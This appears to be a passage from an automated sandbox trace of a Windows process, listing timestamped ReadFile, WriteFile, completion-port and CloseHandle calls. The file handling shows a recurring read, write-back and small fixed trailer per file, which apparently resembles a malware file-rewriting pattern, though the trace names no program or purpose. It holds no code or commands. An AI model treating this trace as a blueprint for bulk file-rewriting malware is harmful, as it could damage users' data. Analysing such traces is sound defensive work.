lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x2b70020) returned 1 [0168.949] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.949] WriteFile (in: hFile=0x1c8, lpBuffer=0x710124*, nNumberOfBytesToWrite=0x1789b, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x710020) returned 1 [0168.950] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.950] WriteFile (in: hFile=0x194, lpBuffer=0x2b70124*, nNumberOfBytesToWrite=0x11823, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x2b70020) returned 1 [0168.950] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.950] ReadFile (in: hFile=0x1c8, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x710020) returned 0x0 [0168.950] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.950] ReadFile (in: hFile=0x194, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x2b70020) returned 0x0 [0168.950] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 0 [0168.951] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0168.951] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 0 [0168.951] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0168.951] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.951] WriteFile (in: hFile=0x1c8, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x710020) returned 1 [0168.951] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.951] WriteFile (in: hFile=0x194, lpBuffer=0x2b70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70094*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x2b70020) returned 1 [0168.951] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.951] CloseHandle (hObject=0x1c8) returned 1 [0168.952] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0168.953] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.953] CloseHandle (hObject=0x194) returned 1 [0168.954] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2b70020) returned 1 [0168.956] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 Thread: id = 116 os_tid = 0xb44 [0148.850] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0156.324] WriteFile (in: hFile=0x1b8, lpBuffer=0x3870124, nNumberOfBytesToWrite=0xd0f2, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3870020 | out: lpBuffer=0x3870124, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3870020) returned 0x0 [0156.331] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 0 [0156.331] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3630020) returned 1 [0156.331] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0156.331] WriteFile (in: hFile=0x1ac, lpBuffer=0x2b70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70094*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x2b70020) returned 1 [0156.351] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0156.351] ReadFile (in: hFile=0x1bc, lpBuffer=0x3ab0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x29afdc8, lpOverlapped=0x3ab0020 | out: lpBuffer=0x3ab0124*, lpNumberOfBytesRead=0x29afdc8*=0x0, lpOverlapped=0x3ab0020) returned 1 [0156.351] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0156.351] ReadFile (in: hFile=0x1cc, lpBuffer=0x3990124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x29afdc8, lpOverlapped=0x3990020 | out: lpBuffer=0x3990124, lpNumberOfBytesRead=0x29afdc8*=0x0, lpOverlapped=0x3990020) returned 0x0 [0156.351] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 0 [0156.351] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3870020) returned 1 [0156.351] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0156.351] CloseHandle (hObject=0x194) returned 1 [0156.362] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0156.362] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 0 [0156.362] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3990020) returned 1 [0156.362] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0156.362] WriteFile (in: hFile=0x1b8, lpBuffer=0x3870094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3870020 | out: lpBuffer=0x3870094*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3870020) returned 1 [0156.377] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0156.377] WriteFile (in: hFile=0x1cc, lpBuffer=0x3990094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3990020 | out: lpBuffer=0x3990094*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3990020) returned 1 [0156.412] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0156.412] WriteFile (in: hFile=0x1bc, lpBuffer=0x3ab0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3ab0020 | out: lpBuffer=0x3ab0094*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3ab0020) returned 1 [0156.412] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0156.412] CloseHandle (hObject=0x1cc) returned 1 [0156.416] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3990020) returned 1 [0156.419] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0156.666] WriteFile (in: hFile=0x1f0, lpBuffer=0x3510124*, nNumberOfBytesToWrite=0x1ca7, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3510020) returned 1 [0156.674] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0157.489] WriteFile (in: hFile=0x1a4, lpBuffer=0x2b70124*, nNumberOfBytesToWrite=0x6ec6, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x2b70020) returned 1 [0157.526] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0157.526] ReadFile (in: hFile=0x1a4, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x29afdc8, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124, lpNumberOfBytesRead=0x29afdc8*=0x0, lpOverlapped=0x2b70020) returned 0x0 [0157.526] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 0 [0157.526] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0157.526] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0157.526] WriteFile (in: hFile=0x1a4, lpBuffer=0x2b70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70094*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x2b70020) returned 1 [0157.531] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0157.531] CloseHandle (hObject=0x1a4) returned 1 [0157.547] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2b70020) returned 1 [0157.550] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0158.687] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510124*, nNumberOfBytesToWrite=0xc8bb, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3510020) returned 1 [0158.717] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 0 [0158.719] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0158.720] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0158.720] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3510020 | out: lpBuffer=0x3510094*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3510020) returned 1 [0158.727] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0158.727] CloseHandle (hObject=0x1c8) returned 1 [0158.749] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3510020) returned 1 [0158.752] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0158.752] ReadFile (in: hFile=0x1c8, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x29afdc8, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x29afdc8*=0x0, lpOverlapped=0x710020) returned 1 [0158.752] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0158.753] WriteFile (in: hFile=0x1c8, lpBuffer=0x710124*, nNumberOfBytesToWrite=0x157be, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x710020) returned 1 [0158.756] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0158.756] ReadFile (in: hFile=0x1c8, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x29afdc8, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x29afdc8*=0x0, lpOverlapped=0x710020) returned 0x0 [0158.756] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 0 [0158.756] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0158.756] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0158.756] WriteFile (in: hFile=0x1c8, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x710020) returned 1 [0158.759] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0158.759] CloseHandle (hObject=0x1c8) returned 1 [0158.784] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0158.784] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0158.941] ReadFile (in: hFile=0x1ac, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x29afdc8, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x29afdc8*=0x0, lpOverlapped=0x710020) returned 1 [0158.942] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0158.942] ReadFile (in: hFile=0x1c0, lpBuffer=0x37e0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x29afdc8, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0124*, lpNumberOfBytesRead=0x29afdc8*=0x0, lpOverlapped=0x37e0020) returned 1 [0158.942] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0158.942] WriteFile (in: hFile=0x1ac, lpBuffer=0x710124*, nNumberOfBytesToWrite=0xc921, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x710020) returned 1 [0158.942] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0158.942] WriteFile (in: hFile=0x1c0, lpBuffer=0x37e0124*, nNumberOfBytesToWrite=0x555, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0124*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x37e0020) returned 1 [0158.942] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0158.943] ReadFile (in: hFile=0x1ac, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x29afdc8, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x29afdc8*=0x0, lpOverlapped=0x710020) returned 0x0 [0158.943] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0158.943] ReadFile (in: hFile=0x1c0, lpBuffer=0x37e0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x29afdc8, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0124, lpNumberOfBytesRead=0x29afdc8*=0x0, lpOverlapped=0x37e0020) returned 0x0 [0158.943] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 0 [0158.943] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0158.943] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 0 [0158.943] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x37e0020) returned 1 [0158.943] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0158.943] WriteFile (in: hFile=0x1ac, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x710020) returned 1 [0158.943] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0158.943] WriteFile (in: hFile=0x1c0, lpBuffer=0x37e0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0094*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x37e0020) returned 1 [0158.943] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0158.943] CloseHandle (hObject=0x1ac) returned 1 [0158.945] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0158.955] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0159.081] WriteFile (in: hFile=0x194, lpBuffer=0x2b70124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x2b70020) returned 1 [0159.085] GetQueuedCompletionStatus (in: CompletionPort=0xd8, 